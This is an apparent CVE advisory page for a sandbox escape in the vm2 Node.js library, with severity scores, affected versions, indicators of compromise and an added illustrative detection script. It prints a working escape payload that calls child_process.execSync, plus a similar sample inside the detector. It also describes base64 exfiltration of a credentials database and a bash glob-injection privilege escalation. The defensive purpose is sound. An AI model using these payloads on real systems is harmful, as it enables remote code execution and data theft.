CVE-2023-32314
published 2023-05-15

Priority: P2 (73)
CVSS 3.1: 10.0 critical
Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS: 5.60% (91.9th percentile)

vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Affected (3 ranges)

Vendor        Product   Version range    Fixed in
patriksimek   vm2       < 3.9.18         3.9.18
vm2_project   vm2       < 3.9.18         3.9.18
vm2_project   vm2       >= 0 < 3.9.18    3.9.18

Detection & IOCs (extracted from sources)

command: const err = new Error(); err.name = { toString: new Proxy(() => "", { apply(target, thiz, args) { const process = args.constructor.constructor("return process")(); throw process.mainModule.require("child_process").execSync("ping -c1 10.10.14.14").toString(); }, }), }; try { err.stack; } catch (stdout) { stdout; }
url: https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac
port: 3000
  • CVE-2023-32314 exploit abuses Proxy-based host object creation in vm2 ≤3.9.17; detect JavaScript payloads calling `args.constructor.constructor("return process")()` within vm2 sandbox contexts to identify sandbox escape attempts.
  • Monitor for `process.mainModule.require("child_process").execSync(...)` patterns in code submitted to vm2-backed Node.js sandboxes (e.g., on port 3000), as this is the RCE execution chain used post-escape.
  • Alert on `base64 -w0 /var/www/contact/tickets.db` or similar base64 exfiltration commands executed on the host, indicating post-exploitation data theft of the SQLite credential store.
  • Detect bash glob/wildcard injection against scripts using unquoted `==` comparisons in `[[ ]]` conditionals (e.g., supplying `a*` as input) — a privilege escalation technique used against `/opt/scripts/mysql-backup.sh` running as root.
  • The vm2 sandbox escape (CVE-2023-32314) affects all versions up to and including 3.9.17; version 3.9.18 contains the patch. The observed vulnerable deployment used version 3.9.16.
  • No known workarounds exist for CVE-2023-32314; upgrading to vm2 ≥3.9.18 is the only remediation.
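
A pre-execution screen for a vm2-backed sandbox that applies the two indicators above (the `.constructor.constructor("return process")` reach-through and the `process.mainModule.require("child_process")` execution chain) and checks the deployed vm2 version against the 3.9.18 fix. This is an added example, not code from the advisory or from the vm2 project; the function names, the regexes and the sample submissions are assumptions constructed for illustration.

```javascript
// Added example (not from the advisory or the vm2 project): screen code
// submitted to a vm2-backed sandbox for the indicator chains listed above,
// and check the deployed vm2 version against the fixed release 3.9.18.
// Function names, regexes and sample inputs below are assumptions.

const INDICATORS = [
  {
    id: "constructor-chain",
    // Reaching the host Function constructor via a value's .constructor.constructor
    // and evaluating "return process": the escape primitive named in the IOCs.
    re: /\.constructor\s*\.\s*constructor\s*\(\s*["'`]return\s+process["'`]\s*\)/,
  },
  {
    id: "child_process-exec",
    // Post-escape execution chain: process.mainModule.require("child_process").exec*
    re: /process\s*\.\s*mainModule\s*\.\s*require\s*\(\s*["'`]child_process["'`]\s*\)\s*\.\s*exec/,
  },
];

// Returns which indicators fired; block the submission when any did.
function scanSubmission(source) {
  const hits = INDICATORS.filter((ind) => ind.re.test(source)).map((ind) => ind.id);
  return { block: hits.length > 0, hits };
}

// vm2 <= 3.9.17 is affected; true means the deployment still needs the 3.9.18 upgrade.
function isVulnerableVm2(version) {
  const parts = version.split(".").map(Number);
  if (parts.length !== 3 || parts.some(Number.isNaN)) {
    throw new Error(`unparseable vm2 version: ${version}`);
  }
  const fixed = [3, 9, 18];
  for (let i = 0; i < 3; i++) {
    if (parts[i] !== fixed[i]) return parts[i] < fixed[i];
  }
  return false; // exactly 3.9.18
}

// Constructed sample submissions (not captured traffic).
const BENIGN_SUBMISSION = "const total = [1, 2, 3].reduce((a, b) => a + b, 0); total;";
const SUSPICIOUS_SUBMISSION =
  'const process = args.constructor.constructor("return process")();' +
  ' process.mainModule.require("child_process").execSync("id");';

// Stand-alone run: the suspicious sample is blocked, the benign one passes.
console.log(scanSubmission(BENIGN_SUBMISSION), scanSubmission(SUSPICIOUS_SUBMISSION));
console.log("vm2 3.9.16 vulnerable:", isVulnerableVm2("3.9.16")); // true
```

A pattern screen only raises an alert on the chains already seen; the advisory lists no workaround, so the version check is the control that matters.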

CVSS provenance

nvd: v3.1 10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vendor_redhat: 9.8 CRITICAL